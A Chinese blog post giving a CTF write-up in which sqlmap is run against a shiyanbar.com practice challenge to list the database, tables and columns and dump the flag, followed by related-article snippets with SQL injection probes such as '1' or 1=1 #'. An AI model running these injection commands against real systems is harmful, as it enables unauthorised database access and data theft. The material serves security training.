ctf题库--简单的sql注入③

最新推荐文章于 2025-07-28 15:51:45 发布
最新推荐文章于 2025-07-28 15:51:45 发布
阅读量6k 收藏 24
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 其它 文章标签: ctf题库 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/miko2018/article/details/83315828
本文通过一个具体的CTF挑战,详细解析了如何利用SQLmap工具进行SQL注入攻击,包括数据库、表和字段的探测,以及敏感信息的提取过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<题目>
mysql报错注入
格式:flag{}
解题链接: http://ctf5.shiyanbar.com/web/index_3.php
<解答>
1.打开题目链接,在查询中输入1,发现地址栏变化。
1
2.认为这里可能(看题目其实知道是一定)存在一个sql注入。
3.使用工具sqlmap进行注入(以该地址栏id值为例)。

  • 查看当前数据库:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db 1

  • 查看(猜解)表:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables
2

  • 查看(猜解)flag表的列:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -columns
3

  • 将flag表中的flag值dump一下:

Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump

即可得到最终的值:
4

后记:如果不熟悉sqlmap,则最先应记住几个常用的注入语句和常见的注入方法,必要时也可以考虑手工注入。

一道简单sql注入题目
weixin_44215027的博客
11-05 2118
一道简单sql注入题目 好久都没有做ctf题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
决斗场 - 实验吧 WEB 简单sql注入
RaAlGhul的博客
11-14 2183
题目链接:http://www.shiyanbar.com/ctf/1875 题目提示:通过注入获得flag值。 点开题目,又是一个简洁的界面让我一脸懵逼(0.0) 好吧,开始我们的注入之旅。 首先,随便往框里面输入字符和数字,发现当输入1、2、3的时候有查询结果。 接下来进行注入的第一步测试,输入一个带单引号的数据,目的是测试是否对构造SQL的字符串进行了过滤。当把带有
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1540
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
全网最全CTF真题讲解,打CTF比赛看这篇就够了
m0_64365896的博客
07-10 909
Capture The Flag (CTF) 竞赛已成为网络安全领域检验实战能力的“试金石”。无论是Web渗透、逆向工程,还是密码学、二进制漏洞利用(Pwn),每一道真题都凝聚着出题人的巧思和安全攻防的精髓。本文旨在剖析CTF中几类核心题型,并结合**典型真题片段(基于常见公开赛题改编)**,揭示其背后的解题思路和关键技术点,助你提升实战能力
实验吧ctf-web题:简单sql注入
热门推荐
Elvira
08-25 1万+
简单sql注入 1. 基于报错的检测方法 2. 基于布尔的检测方法
简单SQL注入
stars77的博客
12-18 674
简单SQL注入 题目进入显示如下 0X01 手工注入 登录框里有个公告,感觉是突破口,点进去后显示如下 在这里测试是否有注入点 一、判断是否存在注入 id=2 and 1=1 id=2 and 1=2 adodb.field 错误 ‘80020009’ bof 或 eof 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 /new_list.asp,行 0 说明...
SQL注入入门题[极客大挑战 2019]
qq_51439282的博客
12-06 550
[极客大挑战 2019]EasySQL题目就知道是sql注入,还说是很简单的,那倒要看看有多简单 打开网页在账号密码那都输入上’1看看果然有明显的回响,然后输入一下我们的永真语句试试好家伙,真就简单的直接出flag了 最近也在学一写sql注入的内容,看了几期视频,发现在构造1' or 1 = 1#’时,sql代码本身是自带有' '两个引号的然后你加入1'之后他就会与前面的单引号自动闭合'1''输入之后就会得到这样的结果,多出了一个单引号,也正是这个原因我们可以通过加'来判断这个是否存在sql注入,如果存
CTF-Web学习笔记:SQL注入
最新发布
Deng7326的博客
07-28 1058
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
后台登录(实验吧CTF题库-WEB)
MyCyber
05-20 4108
后台登录(实验吧CTF题库-WEB) 题目概述 分值:10 难度:易参 解题通过率:94% 格式:flag:{xxx} 题目链接:http://www.shiyanbar.com/ctf/2036 参考解题步骤 1、首先,我们先查看一下网页源码,发现其中有以下注释内容 $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE u...
ctf 选择题 题库_实验吧CTF题库-WEB题(部分)
weixin_39613548的博客
12-19 1321
看起来有点难提交adminhttp://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login用sqlmap检测是否有注入┌─[root@sch01ar]─[/sch01ar]└──╼ #sqlmap -u "http://ctf5.shiyanbar.com/basic/injec...
CTF题库超详细资源合集( Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译)
09-06
常见的Web漏洞包括SQL注入、跨站脚本攻击(XSS)、文件包含漏洞、远程代码执行漏洞、文件上传漏洞以及服务器端请求伪造(SSRF)等。这些漏洞类型考验参赛者对网站结构和服务器配置的理解,以及对漏洞成因和利用方法...
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
1. **SQL注入**:参赛者需要了解如何利用不安全的SQL查询来获取敏感信息,以及如何防御这类攻击,如参数化查询、输入验证和使用预编译语句。 2. **XSS(Cross Site Scripting)**:试题可能包含对XSS漏洞的利用,如...
南邮CTF--SQL注入
weixin_34219944的博客
05-18 364
南邮CTF--SQL注入题目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入 2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功 3.继续改参数,1=2时,没有任何信息,找到注入点 4.利用order by 查询列数,当查询2时,显...
CTF-web题之简单SQL注入
qq_25046827的博客
11-24 5506
这两天闲着没事报名了学校信安和网安组织的网络安全大赛,靠着仅有的一点web知识做了几道web题,现在记录一下其中一道sql注入题的解题思路 首先题面如下 首先通过语句判断有多少个字段: 1' or 1=1 order by 4 # 1' or 1=1 order by 3 # order by是按by后面的数字或字段名所在列进行排序,如果结果集只有3列,order by4则会报错,故可以用来判断结果集的字段数 第一条语句报错,第二条语句返回 admin 5ef582761f2cafceebdfc8c
SQL注入题目
Pvr1sC的博客
03-17 958
极客大挑战2019 EasySQL 简单题,'发现注入点 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 写入1’ or 1=1 # [强网杯 2019]随便注 堆叠注入sql中,分号表示一条语句的结束。如果在分号的后面再加一条语句,这条语句也可以
sql注入考题
Kevinzkyy的博客
05-13 410
进入网址​ngo: the Web framework for perfectionists with deadline. 之后访问Log in | Django site admin 账号:admin 密码:a123123123 进入管理页面 点击Users右侧的Add添加用户 在添加用户界面输入用户名和密码 然后点击SVAE添加用户,并对用户信息进行完善 用户创建成功 ...
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 1351
例题。
CTF实验吧简单sql注入。自己写的wp!
qq_41326328的博客
05-04 1534
这次来写了一个wp,我是小白希望大神们可以指点,因为自己是一个人搞sql,有人指点能够少走很多弯路。 先看这一题,我刚进来居然还来了个乱码,不管了开始,看到这题目,命令注入得到flag,就想这一题无非就是绕过过滤,进行爆库爆数据得到flag 输入1,2,3以后,得到一些表名,这时就在猜想后台sql查询语句为:select name where id =xxxxx; 先判断注入点 先用1 an...
CTF-SQL- 简单SQL注入1
小落的博客
10-26 678
简单SQL注入1 测试注入点 测试过滤规则 简单的添加一个union,发现没有过滤 (1union 这怎么有点像php弱类型了) 在union加一个空格以及一个and,发现union被过滤,那么可以猜测他的过滤规则和两端的空格有关。、 3. 查看到底有几个关键词被过滤了 1 union select group_concat(table_name) from informa...
ctf题库
03-20
以某次比赛中遇到的一个典型SQL注入为例:当访问目标网站时仅能见到单一输入框(Search New),经过简单试探发现该参数存在安全隐患;进一步利用字符串拼接技巧成功绕过了原始验证机制从而读取到了后台数据库结构信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值